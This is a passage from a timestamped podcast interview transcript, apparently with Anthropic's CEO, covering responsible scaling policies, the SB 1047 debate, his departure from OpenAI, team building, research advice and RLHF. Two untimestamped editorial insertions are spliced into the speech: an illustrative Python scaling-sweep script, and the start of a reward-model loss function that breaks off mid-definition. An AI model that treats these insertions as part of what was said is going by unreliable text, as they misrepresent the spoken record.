01:20:38.660 | function for getting the company.
01:20:40.500 | To take these risks seriously, to put them into product planning, to really
01:20:45.500 | make them a central part of work at Anthropic and to make sure that all
01:20:50.060 | of a thousand people, and it's almost a thousand people now at Anthropic
01:20:52.900 | understand that this is one of the highest priorities of the company,
01:20:55.940 | if not the highest priority.
01:20:57.540 | But one, there are still some companies that don't
01:21:03.940 | have RSP-like mechanisms. OpenAI and
01:21:06.900 | Google did adopt these mechanisms a couple of months after
01:21:11.460 | Anthropic did, but there are other companies out there that
01:21:16.140 | don't have these mechanisms at all.
01:21:17.740 | Uh, and so if some companies adopt these mechanisms and others don't, uh, it's
01:21:23.940 | really going to create a situation where, you know, some of these dangers have
01:21:27.860 | the property that it doesn't matter if three out of five of the companies are
01:21:30.900 | being safe, if the other two are, are being, are being unsafe, it
01:21:34.300 | creates this negative externality.
01:21:36.100 | And, and I think the lack of uniformity is not fair to those of us who have
01:21:39.820 | put a lot of effort into being very thoughtful about these procedures.
01:21:43.340 | The second thing is, I don't think you can trust these companies to adhere to
01:21:48.500 | these voluntary plans on their own, right?
01:21:51.060 | I like to think that Anthropic will; we do everything we can so that we will.
01:21:54.980 | Our RSP is checked by our Long-Term Benefit Trust.
01:21:59.460 | So, you know, we do everything we can to adhere to our own RSP.
01:22:06.700 | Um, but you know, you hear lots of things about various companies saying, oh,
01:22:11.700 | they said they would do, they said they would give this much compute and they
01:22:14.260 | didn't, they said they would do this thing and they didn't, um, you know, I
01:22:17.900 | don't, I don't think it makes sense to, you know, to, to, to, you know, litigate
01:22:22.180 | particular things that companies have done, but I think this, this broad
01:22:25.580 | principle that like, if there's nothing watching over them, there's nothing
01:22:29.260 | watching over us as an industry, there's no guarantee that we'll do the right
01:22:32.980 | thing and the stakes are very high.
01:22:34.420 | And so I think it's important to have a uniform standard
01:22:38.820 | that everyone follows, and to make sure simply
01:22:43.780 | that the industry does what a majority of the industry has already said is
01:22:48.340 | important and has already said that they definitely will do.
01:22:52.060 | Right.
01:22:52.340 | Some people, uh, you know, I think there's, there's a class of people who
01:22:55.540 | are against regulation on principle.
01:22:58.500 | I understand where that comes from.
01:23:00.060 | If you go to Europe and you see something like GDPR, you see
01:23:03.660 | some of the other stuff that they've
01:23:06.900 | done, some of it's good, but some of it is really unnecessarily
01:23:10.740 | burdensome, and I think it's fair to say it really has slowed
01:23:14.780 | innovation. And so I understand where people are coming from on priors.
01:23:18.460 | I understand why people start from that position.
01:23:22.300 | Uh, but, but again, I think AI is different.
01:23:25.380 | If we go to the very serious risks of autonomy and misuse that I
01:23:31.460 | talked about just a few minutes ago, I think those are
01:23:37.420 | unusual and they warrant an unusually strong response.
01:23:41.900 | And so I think it's very important.
01:23:44.300 | Again, um, we need something that everyone can get behind.
01:23:48.140 | Uh, you know, I think one of the issues with SB 1047, uh, especially the
01:23:54.140 | original version of it was it, it had a bunch of the structure of RSPs, but
01:24:01.340 | it also had a bunch of stuff that was either clunky or that, that, that just
01:24:06.300 | would have created a bunch of burdens, a bunch of hassle, and might even have
01:24:11.180 | missed the target in terms of addressing the risks.
01:24:14.140 | Um, you don't really hear about it on Twitter.
01:24:16.340 | You just hear about kind of, you know, people are, people are
01:24:19.260 | cheering for any regulation.
01:24:21.260 | And then the folks who are against make up these often quite intellectually
01:24:25.140 | dishonest arguments about how, you know, it'll make
01:24:28.820 | us move away from California.
01:24:30.700 | The bill doesn't apply based on whether you're headquartered in California; the bill only
01:24:33.980 | applies if you do business in California. Or that it would damage the open
01:24:38.020 | source ecosystem, or that it would cause all of these
01:24:42.420 | things. I think those were mostly nonsense, but there are better
01:24:47.020 | arguments against regulation.
01:24:49.140 | There's one guy, uh, Dean Ball, who's really, you know, I think a very
01:24:52.500 | scholarly, scholarly analyst who, who looks at what happens when a regulation
01:24:57.220 | is put in place in ways that they can kind of get a life of their own or
01:25:01.740 | how they can be poorly designed.
01:25:03.500 | And so our interest has always been, we do think there should be regulation in
01:25:07.900 | this space, but we want to be an actor who makes sure that that
01:25:13.700 | regulation is something that's surgical, that's targeted at the serious risks,
01:25:18.820 | and is something people can actually comply with. Because something I think
01:25:22.540 | the advocates of regulation don't understand as well as they could is, if
01:25:27.420 | we get something in place that is poorly targeted, that
01:25:34.140 | wastes a bunch of people's time.
01:25:36.460 | What's going to happen is people are going to say, see these safety risks.
01:25:40.260 | There, you know, this is nonsense.
01:25:43.020 | I just, you know, I just had to hire 10 lawyers
01:25:46.020 | to fill out all these forms.
01:25:47.660 | I had to run all of these tests for something that was clearly not dangerous.
01:25:50.860 | And after six months of that, there will be a groundswell
01:25:54.540 | and we'll end up with a durable consensus against regulation.
01:25:58.860 | And so I think the worst enemy of those who want real
01:26:03.580 | accountability is badly designed regulation. We need to actually
01:26:07.700 | get it right, and this is, if there's one thing I could say to the
01:26:11.420 | advocates, it would be that I want them to understand this dynamic better.
01:26:15.380 | And we need to be really careful and we need to talk to people who actually
01:26:18.940 | have, who actually have experience seeing how regulations play out in
01:26:23.300 | practice and, and the people who have seen that understand to be very careful.
01:26:27.700 | If this were some lesser issue, I might be against any regulation at all.
01:26:31.860 | But what I want the opponents to understand is that the
01:26:36.820 | underlying issues are actually serious.
01:26:39.060 | They're not something that I or the other companies
01:26:43.540 | are just making up because of regulatory capture. They're not sci-fi fantasies.
01:26:49.300 | They're not any of these things.
01:26:51.340 | Um, you know, every time we have a new model, every few months, we
01:26:55.940 | measure the behavior of these models, and they're getting better and better at
01:26:59.940 | these concerning tasks, just as they are getting better and better at, um, you
01:27:05.180 | know, good, valuable, economically useful tasks. And so I would just love
01:27:11.220 | it if... you know, I think SB 1047 was very polarizing.
01:27:16.100 | I would love it if some of the most reasonable opponents and some of the
01:27:21.580 | most reasonable proponents would sit down together, and, you know,
01:27:28.420 | I think that, you know, the different AI companies,
01:27:31.460 | um, you know, Anthropic was the only AI company that, you know, felt
01:27:36.580 | positively in a very detailed way.
01:27:38.060 | I think Elon tweeted briefly something positive, but, you know, some
01:27:42.860 | of the big ones like Google, OpenAI, Meta, Microsoft were
01:27:47.140 | pretty staunchly against.
01:27:48.980 | So what I would really like is if, you know, some of the key stakeholders,
01:27:52.820 | some of the, you know, most thoughtful proponents and some of the most
01:27:56.180 | thoughtful opponents would sit down and say, how do we solve this problem in
01:28:01.180 | a way that the proponents feel brings a real reduction in risk, and that the
01:28:07.100 | opponents feel is not hampering the industry or hampering
01:28:13.460 | innovation any more than it needs
01:28:17.660 | to. And I think, for whatever reason, things got too polarized and
01:28:23.220 | those two groups didn't get to sit down in the way that they should.
01:28:26.700 | Uh, and, and I feel, I feel urgency.
01:28:29.100 | I really think we need to do something in 2025.
01:28:31.540 | Uh, uh, you know, if we get to the end of 2025 and we've still done nothing
01:28:36.460 | about this, then I'm going to be worried.
01:28:38.420 | I'm not, I'm not worried yet because again, the risks aren't here yet, but,
01:28:42.620 | but I, I think time is running short.
01:28:44.380 | Yeah.
01:28:44.700 | And come up with something surgical, like you said.
01:28:46.540 | Yeah, yeah, yeah, exactly.
01:28:48.340 | And we need to get away from this intense pro-
01:28:54.940 | safety versus intense anti-regulatory rhetoric, right?
01:28:58.860 | It's turned into these, these flame wars on Twitter and nothing
01:29:02.500 | good's going to come of that.
01:29:03.300 | So there's a lot of curiosity about the different players in the game.
01:29:07.020 | One of the, uh, OGs is OpenAI.
01:29:09.220 | You've had several years of experience at OpenAI.
01:29:12.060 | What's your story and history there?
01:29:13.860 | Yeah.
01:29:14.340 | So I was at OpenAI for, uh, roughly five years; for the
01:29:18.900 | last, I think it was a couple of years,
01:29:20.700 | you know, I was a vice president of research there.
01:29:24.340 | Um, probably myself and Ilya Sutskever were the ones who, you know, really
01:29:27.940 | kind of set the research direction around 2016 or 2017.
01:29:32.860 | I first started to really believe in, or at least confirm my belief in the
01:29:36.500 | scaling hypothesis when, when Ilya famously said to me, the thing you need
01:29:40.500 | to understand about these models is they just want to learn, the models just
01:29:44.220 | want to learn. Um, and again, sometimes there are these one-
01:29:47.500 | sentence Zen koans that you hear,
01:29:50.740 | and you're like, ah, that explains everything, that explains
01:29:54.740 | like a thousand things that I've seen.
01:29:56.260 | And then, you know, ever after I had this visualization
01:30:00.020 | in my head of like, you optimize the models in the right way.
01:30:02.820 | You point the models in the right way.
01:30:04.220 | They just want to learn.
01:30:05.460 | They just want to solve the problem regardless of what the problem is.
01:30:08.260 | So get out of their way, basically.
01:30:09.820 | Get out of their way.
01:30:10.900 | Yeah.
01:30:11.220 | Don't impose your own ideas about how they should learn.
01:30:14.420 | Or, you know, this was the same thing as Rich Sutton put out in the
01:30:17.180 | bitter lesson, or Gwern put out in the scaling hypothesis. You know, I think
01:30:21.260 | generally the dynamic was, you know, I got this kind of inspiration
01:30:25.740 | from Ilya and from others, folks like Alec Radford,
01:30:30.140 | who did the original GPT-1, and then ran really hard
01:30:36.260 | with it, me and my collaborators, on GPT-2, GPT-3, RL from human
01:30:41.420 | feedback, which was an attempt to kind of deal with the early safety and
01:30:44.500 | durability, things like debate and amplification, heavy on interpretability.
01:30:49.380 | So again, the combination of safety plus scaling, probably 2018, 2019, 2020.
01:30:55.820 | Those, those were, those were kind of the years when myself and my collaborators,
01:31:01.340 | probably, um, you know, many, many of whom became co-founders of Anthropic kind
01:31:07.180 | of really had, had, had a vision and like, and like drove the direction.
01:31:10.620 | Why'd you leave?
01:31:11.860 | Why'd you decide to leave?
01:31:13.220 | Yeah.
01:31:13.900 | So look, I'm going to put things this way, and I, you know, I think
01:31:17.300 | it ties to the race to the top, right? Which is, you know, in
01:31:22.100 | my time at OpenAI, what I'd come to see is, I'd come to appreciate the scaling
01:31:25.900 | hypothesis, and I'd come to appreciate kind of the importance of safety along
01:31:30.340 | with the scaling hypothesis. The first one, I think, you know, OpenAI was
01:31:34.260 | getting on board with.
01:31:35.740 | Um, the second one in a way had always been part of OpenAI's messaging.
01:31:40.700 | Um, but, uh, you know, over many years of the time that I
01:31:45.940 | spent there, I think I had a particular vision of how we should
01:31:50.220 | handle these things, how they should be brought out in the world, the kind of
01:31:54.060 | principles that the organization should have.
01:31:57.260 | And look, I mean, there were like many, many discussions about like, you know,
01:32:01.740 | should the org do, should the company do this?
01:32:03.580 | Should the company do that?
01:32:04.740 | Like, there's a bunch of misinformation out there.
01:32:07.300 | People say like, we left because we didn't like the deal with Microsoft.
01:32:10.580 | False.
01:32:11.460 | Although, you know, there was a lot of discussion, a lot of questions about
01:32:14.780 | exactly how we do the deal with Microsoft.
01:32:16.700 | Um, or we left because we didn't like commercialization.
01:32:19.140 | That's not true.
01:32:20.180 | We built GPT-3, which was the model that was commercialized.
01:32:23.060 | I was involved in commercialization.
01:32:25.260 | It's, it's more again about how do you do it?
01:32:28.220 | Like civilization is going down this path to very powerful AI.
01:32:32.820 | What's the way to do it?
01:32:34.460 | That is cautious, straightforward, honest, um, that builds trust in the
01:32:42.340 | organization and in individuals.
01:32:44.580 | How do we get from here to there?
01:32:46.980 | And how do we have a real vision for how to get it right?
01:32:49.460 | How can safety not just be something we say because it helps with recruiting?
01:32:54.900 | Um, and you know, I think, I think at the end of the day, um, if you have a vision
01:32:59.820 | for that, forget about anyone else's vision, I don't want to talk about anyone
01:33:02.820 | else's vision, if you have a vision for how to do it, you should go off
01:33:06.460 | and you should do that vision.
01:33:07.620 | It is incredibly unproductive to try and argue with someone else's vision.
01:33:12.340 | You might think they're not doing it the right way.
01:33:14.500 | You might think they're, they're, they're dishonest.
01:33:16.900 | Who knows?
01:33:17.340 | Maybe you're right.
01:33:17.940 | Maybe you're not.
01:33:18.500 | Um, uh, but, uh, what, what you should do is you should take some people you trust
01:33:23.420 | and you should go off together and you should make your vision happen.
01:33:26.260 | And if your vision is compelling, if you can make it appeal to people, some,
01:33:30.660 | you know, some combination of ethically, you know, in the market, uh, you know,
01:33:35.820 | if, if you can, if you can make a company, that's a place people want to join, uh,
01:33:40.900 | that, you know, engages in practices that people think are, are reasonable while
01:33:46.060 | managing to maintain its position in the ecosystem at the same time.
01:33:49.380 | If you do that, people will copy it.
01:33:51.860 | Um, and the fact that you are doing it, especially the fact that you're doing
01:33:55.460 | it better than they are, um, causes them to change their behavior in a much more
01:33:59.980 | compelling way than if they're your boss and you're arguing with them.
01:34:03.340 | I just, I don't know how to be any more specific about it than that, but I think
01:34:07.380 | it's generally very unproductive to try and get someone else's vision
01:34:11.460 | to look like your vision.
01:34:12.660 | Um, it's much more productive to go off and do a clean experiment
01:34:16.980 | and say, this is our vision.
01:34:18.620 | This is how, this is, this is how we're going to do things.
01:34:21.100 | Your choice is you can, you can ignore us, you can reject what we're doing, or you
01:34:27.140 | can, you can start to become more like us.
01:34:29.980 | And imitation is the sincerest form of flattery.
01:34:32.300 | Um, and you know, that plays out in the behavior of customers.
01:34:37.380 | That plays out in the behavior of the public. That plays out in the behavior
01:34:40.700 | of where people choose to work.
01:34:41.940 | Uh, and again, at the end, it's not about one company winning
01:34:47.100 | or another company winning. If we or another company are engaging in
01:34:52.380 | some practice that, you know, people find genuinely appealing.
01:34:57.580 | And I want it to be in substance, not just, not just in appearance.
01:35:00.500 | Um, and you know, I think, I think researchers are sophisticated
01:35:03.940 | and they look at substance.
01:35:05.100 | Uh, and then other companies start copying that practice and they win
01:35:10.100 | because they copied that practice.
01:35:11.620 | That's great.
01:35:12.340 | That's success.
01:35:13.220 | That's like the race to the top.
01:35:15.100 | It doesn't matter who wins in the end, as long as everyone is copying
01:35:18.380 | everyone else's good practices.
01:35:19.780 | Right.
01:35:20.060 | One way I think of it is like the thing we're all afraid of
01:35:23.100 | is the race to the bottom.
01:35:23.980 | Right.
01:35:24.220 | And the race to the bottom doesn't matter who wins because we all lose.
01:35:27.540 | Right.
01:35:28.020 | Like, you know, in the most extreme world, we, we make this autonomous AI that,
01:35:31.900 | you know, the robots enslave us or whatever.
01:35:33.620 | Right.
01:35:33.860 | I mean, that's half joking, but you know, that, that is the most
01:35:37.460 | extreme, uh, thing, thing that could happen then, then it doesn't
01:35:40.820 | matter which company was ahead.
01:35:42.460 | Um, if instead you create a race to the top where people are competing
01:35:47.180 | to engage in good, in good practices, uh, then, you know, at the end of
01:35:51.900 | the day, you know, it doesn't matter who ends up, who ends up winning.
01:35:55.300 | It doesn't even matter who, who started the race to the top.
01:35:57.700 | The point isn't to be virtuous.
01:35:59.060 | The point is to get the system into a better equilibrium than it was before.
01:36:03.100 | And, and individual companies can play some role in doing this.
01:36:06.380 | Individual companies can, can, you know, can help to start it,
01:36:10.540 | can help to accelerate it.
01:36:12.020 | And frankly, I think individuals at other companies have,
01:36:14.740 | have done this as well.
01:36:15.660 | Right.
01:36:15.900 | The individuals who, when we put out an RSP, react by pushing harder
01:36:21.140 | to get something similar done at other
01:36:25.020 | companies. Sometimes other companies do something, and we're like,
01:36:27.900 | oh, it's a good practice.
01:36:28.860 | We think, we think that's good.
01:36:30.340 | We should adopt it too.
01:36:31.420 | The only difference is, you know, I think, I think we are, um, we
01:36:35.580 | try to be more forward leaning.
01:36:37.140 | We try and adopt more of these practices first and
01:36:39.820 | adopt them more quickly when others, when others invent them.
01:36:42.460 | But I think this dynamic is what we should be pointing at.
01:36:45.780 | And that, I think, I think it abstracts away the question of, you know, which
01:36:50.860 | company's winning, who trusts, who, I think all these, all these questions
01:36:55.100 | of drama are, are profoundly uninteresting.
01:36:57.980 | And, and the, the thing that matters is the ecosystem that we all
01:37:01.540 | operate in and how to make that ecosystem better, because that
01:37:04.500 | constrains all the players.
01:37:05.940 | And so Anthropic is this kind of clean experiment built on a foundation of like
01:37:10.820 | what concretely AI safety should look like.
01:37:13.500 | Well, look, I'm sure we've made plenty of mistakes along the way.
01:37:16.420 | The perfect organization doesn't exist.
01:37:18.900 | It has to deal with the, the imperfection of a thousand employees.
01:37:23.100 | It has to deal with the imperfection of our leaders, including me.
01:37:25.900 | It has to deal with the imperfection of the people we've put, we've put to, you
01:37:30.260 | know, to oversee the imperfection of the, of the leaders, like the, like the board
01:37:33.900 | and the long-term benefit trust.
01:37:35.460 | It's, it's all, it's all a set of imperfect people trying to aim
01:37:39.460 | imperfectly at some ideal that will never perfectly be achieved.
01:37:42.380 | Um, that's what you sign up for.
01:37:44.300 | That's what it will always be.
01:37:45.660 | But, uh, uh, imperfect doesn't mean you just give up.
01:37:49.740 | There's better and there's worse.
01:37:51.340 | And hopefully we can do well
01:37:55.700 | enough that we can begin to build some practices that the whole industry engages
01:37:59.980 | in. And then, you know, my guess is that multiple of these companies will be
01:38:03.620 | successful. Anthropic will be successful.
01:38:05.860 | These other companies, like ones I've been at in the past, will also be
01:38:09.180 | successful, and some will be more successful than others. That's less
01:38:12.820 | important than, again, that we align the incentives of the industry.
01:38:16.660 | And that happens partly through the race to the top, partly through things
01:38:19.980 | like RSP, partly through again, selected surgical regulation.
01:38:24.460 | You said talent density beats talent mass.
01:38:28.460 | So can you explain that?
01:38:30.820 | Can you expand on that?
01:38:31.660 | Can you just talk about what it takes to build a great team of
01:38:34.420 | AI researchers and engineers?
01:38:37.340 | This is one of these statements
01:38:38.580 | that's like more true every month. Every month,
01:38:41.660 | I see the statement as more true than I did the month before.
01:38:44.100 | So if I were to do a thought experiment, let's say you have a team of 100 people
01:38:50.300 | that are super smart, motivated, and aligned with the mission, and that's
01:38:53.700 | your company, or you can have a team of a thousand people where 200 people are
01:38:58.460 | super smart, super aligned with the mission, and then like 800 people are,
01:39:05.420 | let's just say you pick 800, like random, random big tech employees,
01:39:09.180 | which would you rather have, right?
01:39:10.980 | The talent mass is greater in the group of a thousand people, right?
01:39:16.340 | You have even a larger number of incredibly talented, incredibly
01:39:20.700 | aligned, incredibly smart people.
01:39:22.900 | But the issue is just that if every time someone super talented looks around,
01:39:30.940 | they see someone else super talented and super dedicated, that sets
01:39:34.700 | the tone for everything, right?
01:39:36.180 | That sets the tone for everyone is super inspired to work at the same place.
01:39:40.180 | Everyone trusts everyone else.
01:39:41.980 | If you have a thousand or 10,000 people and things have really regressed, right?
01:39:47.700 | You are not able to do selection and you're choosing random people.
01:39:51.220 | What happens is then you need to put a lot of processes and a
01:39:53.980 | lot of guardrails in place.
01:39:55.540 | Just because people don't fully trust each other, you have to
01:39:59.820 | adjudicate political battles.
01:40:01.500 | Like there are so many things that slow down the org's ability to operate.
01:40:06.060 | And so we're nearly a thousand people and, you know, we've, we've, we've
01:40:09.300 | tried to make it so that as large a fraction of those thousand people as
01:40:13.100 | possible are like super talented, super skilled.
01:40:16.980 | It's one of the reasons we've, we've slowed down hiring a
01:40:20.460 | lot in the last few months.
01:40:21.620 | We grew from 300 to 800, I believe, I think in the first
01:40:25.780 | seven, eight months of the year.
01:40:27.340 | And now we've slowed down.
01:40:28.820 | We're at like, you know, last three months we went from 800 to 900,
01:40:32.460 | 950, something like that.
01:40:33.940 | Don't quote me on the exact numbers, but I think there's an inflection
01:40:37.500 | point around a thousand and we want to be much more careful how, how we, how
01:40:41.420 | we grow, uh, early on and, and now as well, you know, we've hired a lot of
01:40:45.460 | physicists, um, you know, theoretical physicists can learn things really fast.
01:40:49.740 | Um, uh, even, even more recently as we've continued to hire that, you know,
01:40:54.460 | we've really had a high bar for, on both the research side and the software
01:40:58.780 | engineering side have hired a lot of senior people, including folks who used
01:41:02.660 | to be at other, at other companies in this space, and we, we've just
01:41:06.500 | continued to be very selective.
01:41:08.780 | It's very easy to go from a hundred to a thousand and a thousand to 10,000
01:41:13.620 | without paying attention to making sure everyone has a unified purpose.
01:41:18.060 | It's so powerful.
01:41:19.460 | If your company consists of a lot of different fiefdoms that all want to do
01:41:24.300 | their own thing, that are all optimizing for their own thing, um, uh, it's very
01:41:28.540 | hard to get anything done, but if everyone sees the broader purpose of the
01:41:32.100 | company, if there's trust and there's dedication to doing the right thing,
01:41:36.300 | that is a superpower that in itself, I think can overcome almost every other
01:41:40.740 | disadvantage. And, you know, Steve Jobs: A players want to look around
01:41:45.140 | and see other A players, is another way of saying it. I don't know what that is about
01:41:48.940 | human nature, but it is demotivating to see people who are not obsessively
01:41:54.140 | driving towards a singular mission.
01:41:55.660 | And it is, on the flip side of that, super motivating to see that.
01:41:59.460 | It's interesting.
01:42:00.460 | Uh, what's it take to be a great AI researcher or engineer from everything
01:42:06.740 | you've seen from working with so many amazing people?
01:42:08.860 | Yeah.
01:42:09.260 | Um, I think the number one quality, especially on the research side, but
01:42:15.540 | really both, is open-mindedness. It sounds easy to be open-minded, right?
01:42:19.820 | You're just like, oh, I'm open to anything.
01:42:21.340 | Um, but you know, if I, if I think about my own early history in the scaling
01:42:26.420 | hypothesis, um, I was seeing the same data others were seeing.
01:42:31.020 | I don't think I was like a better programmer or better at coming up with
01:42:35.660 | research ideas than any of the hundreds of people that I worked with.
01:42:39.100 | Um, in some ways I was worse.
01:42:41.060 | Um, you know, like I've never liked, you know, precise programming,
01:42:45.980 | like, you know, finding the bug, writing the GPU kernels. I could
01:42:49.860 | point you to a hundred people here who are better at that than I am.
01:42:52.660 | Um, but the thing that I think I did have that was
01:42:57.900 | different was that I was just willing to look at something with new eyes, right?
01:43:03.380 | People said, oh, you know, we don't have the right algorithms yet.
01:43:06.860 | We haven't come up with the right way to do things.
01:43:10.260 | And I was just like, oh, I don't know.
01:43:12.180 | Like, you know, this neural net has like 30 million parameters.
01:43:17.260 | Like, what if we gave it 50 million instead?
01:43:19.220 | Like, let's plot some graphs. That basic scientific mindset of,
01:43:23.980 | oh man, like, you know, I see some variable that I could
01:43:29.180 | change, like what happens when it changes?
01:43:31.820 | Like, let's try these different things and create a graph. Even
01:43:35.660 | this was like the simplest thing in the world, right?
01:43:37.700 | Change the number of... you know, this wasn't like PhD-level experimental design.
01:43:42.380 | This was like simple and stupid.
01:43:45.140 | Like anyone could have done this if you just told
01:43:47.900 | them that it was important.
01:43:49.620 | It's also not hard to understand.
01:43:51.300 | You didn't need to be brilliant to come up with this.
01:43:53.260 | Um, but you put the two things together and you know, some tiny number of people,
01:43:58.300 | some single digit number of people have, have driven forward the
01:44:01.420 | whole field by realizing this.
01:44:03.420 | Uh, and, and it's, you know, it's often like that.
01:44:05.860 | If you look back at the discovery, you know, the discoveries in history,
01:44:09.860 | they're, they're often like that.
01:44:11.340 | And so this, this open-mindedness and this willingness to see with new eyes
01:44:15.580 | that often comes from being newer to the field, often experience
01:44:19.140 | is a disadvantage for this.
01:44:20.700 | That is the most important thing.
01:44:22.340 | It's very hard to look for and test for, but I think, I think it's the most
01:44:25.620 | important thing because when you, when you find something, some really new way
01:44:29.780 | of thinking, thinking about things, when you have the initiative to do that,
01:44:32.860 | it's absolutely transformative.
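A minimal sketch of the kind of "change one variable and plot it" experiment described above, in Python. The toy task, the model widths, and the use of scikit-learn are illustrative assumptions for this sketch, not anything actually run at OpenAI or Anthropic.

```python
# Sweep a single knob (model width), measure held-out loss, and plot the curve.
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_friedman1
from sklearn.neural_network import MLPRegressor

X, y = make_friedman1(n_samples=2000, noise=0.5, random_state=0)  # toy regression task
X_train, y_train, X_test, y_test = X[:1500], y[:1500], X[1500:], y[1500:]

widths = [4, 8, 16, 32, 64, 128]   # the one variable we change
param_counts, losses = [], []
for w in widths:
    model = MLPRegressor(hidden_layer_sizes=(w, w), max_iter=2000, random_state=0)
    model.fit(X_train, y_train)
    losses.append(np.mean((model.predict(X_test) - y_test) ** 2))
    param_counts.append(sum(c.size for c in model.coefs_) +
                        sum(b.size for b in model.intercepts_))

plt.loglog(param_counts, losses, "o-")
plt.xlabel("parameter count")
plt.ylabel("held-out loss")
plt.title("Toy 'loss vs. model size' curve")
plt.show()
```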
01:44:34.180 | And also being able to do kind of rapid experimentation, and in the face of that,
01:44:38.500 | being open-minded and curious, and looking at the data with just these fresh eyes
01:44:42.460 | and seeing what it is actually saying. That applies in, uh,
01:44:45.620 | mechanistic interpretability.
01:44:46.900 | It's another example of this. Like some of the early work in mechanistic
01:44:50.580 | interpretability was so simple.
01:44:52.740 | It's just, no one thought to care about this question before.
01:44:55.660 | You said what it takes to be a great AI researcher.
01:44:58.180 | Can we rewind the clock back?
01:45:00.340 | What advice would you give to people interested in AI?
01:45:02.820 | They're young, looking forward to, how can I make any impact on the world?
01:45:05.900 | I think my number one piece of advice is to just start playing with the models.
01:45:10.220 | Um, this was actually... I worry a little that this seems like obvious advice
01:45:15.100 | now. I think three years ago it wasn't obvious, and people started by, oh, let
01:45:19.300 | me read the latest reinforcement learning paper.
01:45:21.380 | Let me, you know, let me kind of... no, I mean, that was really the...
01:45:24.660 | and I mean, you should do that as well, but, uh, now,
01:45:28.980 | you know, with wider availability of models and APIs, people are doing this
01:45:32.580 | more, but I think, I think just experiential knowledge, um, these models
01:45:39.060 | are new artifacts that no one really understands.
01:45:41.740 | Um, and so getting experience playing with them, I would also say again,
01:45:46.140 | in line with the, like, do something new, think in some new direction.
01:45:49.780 | Like there are all these things that haven't been explored.
01:45:53.220 | Like for example, mechanistic interpretability is still very new.
01:45:56.700 | It's probably better to work on that than it is to work on new model
01:45:59.540 | architectures, because it's, you know, it's more popular than it was before.
01:46:03.420 | There are probably like a hundred people working on it, but there aren't
01:46:05.580 | like 10,000 people working on it.
01:46:07.140 | And it's this fertile area for study, like,
01:46:12.020 | you know, there's so much like low-hanging fruit.
01:46:17.780 | You can just walk
01:46:19.900 | by and you can pick things.
01:46:21.140 | Um, and for whatever reason, people
01:46:25.820 | aren't interested in it enough. I think there are some things around
01:46:29.060 | long-horizon learning and long-horizon tasks, where
01:46:33.540 | there's a lot to be done.
01:46:34.660 | I think evaluations are still, we're still very early in our ability
01:46:38.340 | to study evaluations, particularly for dynamic systems, acting in the world.
01:46:42.300 | I think there's some stuff around multi-agent. Um, skate where the
01:46:47.300 | puck is going is my advice.
01:46:49.380 | And you don't have to be brilliant to think of it.
01:46:51.420 | Like, all the things that are going to be exciting in five years,
01:46:54.900 | people even mention them as, like, you know, conventional
01:46:58.540 | wisdom, but somehow there's this barrier where
01:47:02.140 | people don't double down as much as they could, or they're
01:47:05.860 | afraid to do something that's not the popular thing. I don't know why it
01:47:09.340 | happens, but getting over that barrier, that's my number one
01:47:12.860 | piece of advice. Let's talk, if we could, a bit about post-training.
01:47:16.460 | Yeah.
01:47:16.900 | So it, uh, seems that the modern post-training recipe has, uh,
01:47:22.300 | a little bit of everything.
01:47:23.380 | So supervised fine-tuning, RLHF, uh, the constitutional AI with RLAIF.
01:47:32.140 | Best acronym.
01:47:32.860 | It's again, that naming thing.
01:47:34.620 | Uh, and then synthetic data. It seems like a lot of synthetic data, or at least
01:47:40.660 | trying to figure out ways to have high-quality synthetic data.
01:47:43.180 | So if this is the secret sauce that makes
01:47:46.860 | Anthropic's Claude so, uh, incredible,
01:47:49.540 | how much of the magic is in the pre-training?
01:47:52.620 | How much is in the post-training?
01:47:53.980 | Yeah.
01:47:54.420 | Um, I mean, uh, so first of all, we're not perfectly able
01:47:56.940 | to measure that ourselves.
01:47:58.020 | Um, uh, you know, when you see some, some great character ability, sometimes
01:48:02.300 | it's hard to tell whether it came from pre-training or post-training.
01:48:05.100 | Uh, we've developed ways to try and distinguish between those
01:48:08.460 | two, but they're not perfect.
01:48:09.660 | You know, the second thing I would say is, you know, when there is an
01:48:12.980 | advantage (and I think we've been pretty good in general at RL,
01:48:16.220 | perhaps the best, although I don't know, because I don't
01:48:19.340 | see what goes on inside other companies),
01:48:21.780 | usually it isn't, oh my God, we have this secret magic method
01:48:26.620 | that others don't have.
01:48:27.500 | Right.
01:48:27.820 | Usually it's like, well, you know, we got better at the infrastructure
01:48:31.860 | so we could run it for longer.
01:48:33.260 | Or, you know, we were able to get higher quality data, or we were able
01:48:36.460 | to filter our data better, or we were able to, you know, combine
01:48:39.540 | these methods and practice.
01:48:40.780 | It's usually some boring matter of kind of, uh,
01:48:45.980 | practice and tradecraft.
01:48:47.460 | Um, so, you know, when I think about how to do something special in terms
01:48:51.620 | of how we train these models, both pre-training, but even more so post
01:48:54.660 | training, um, you know, I, I really think of it a little more again, as
01:48:59.620 | like designing airplanes or cars.
01:49:01.860 | Like, you know, it's not just like, oh man, I have the blueprint.
01:49:04.940 | Like maybe that makes you make the next airplane, but like, there's some,
01:49:08.020 | there's some cultural trade craft of how we think about the design process
01:49:12.700 | that I think is more important than, than, you know, than, than any
01:49:15.620 | particular gizmo we're able to invent.
01:49:17.420 | Okay.
01:49:17.980 | Well, about, let me ask you about specific techniques.
01:49:20.380 | So first on RLHF, what do you think, just zooming out, intuition, almost
01:49:25.300 | philosophy: why do you think RLHF works so well? If I go back to like
01:49:29.700 | the scaling hypothesis, one of the ways to state the scaling hypothesis
01:49:33.820 | is if you train for X and you throw enough compute at it, um, then you
01:49:38.060 | get X and, and so RLHF is good at doing what humans want the model to
01:49:43.660 | do, or at least, um, to state it more precisely doing what humans who
01:49:48.060 | look at the model for a brief period of time and consider different
01:49:51.020 | possible responses, what they prefer as the response, uh, which is not
01:49:55.060 | perfect from both the safety and capabilities perspective in that
01:49:58.460 | humans are often not able to perfectly identify what the model wants and
01:50:02.420 | what humans want in the moment may not be what they want in the longterm.
01:50:05.140 | So there's, there's a lot of subtlety there, but the models are good at,
01:50:09.540 | uh, you know, producing what the humans in some shallow sense want.
01:50:13.900 | Uh, and it actually turns out that you don't even have to throw that
01:50:17.780 | much compute at it because of another thing, which is this, this thing
01:50:22.060 | about a strong pre-trained model being halfway to anywhere.
01:50:25.220 | Uh, so once you have the pre-trained model, you have all the
01:50:29.100 | representations you need to get the model
01:50:32.260 | where you want it to go.
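For readers who want the mechanics, here is a minimal sketch of the pairwise objective commonly used to train the reward model in RLHF-style pipelines (the Bradley-Terry form). The scores below are toy numbers, not outputs of any real model, and this is a generic illustration rather than Anthropic's actual training code.

```python
import numpy as np

def preference_loss(scores_chosen, scores_rejected):
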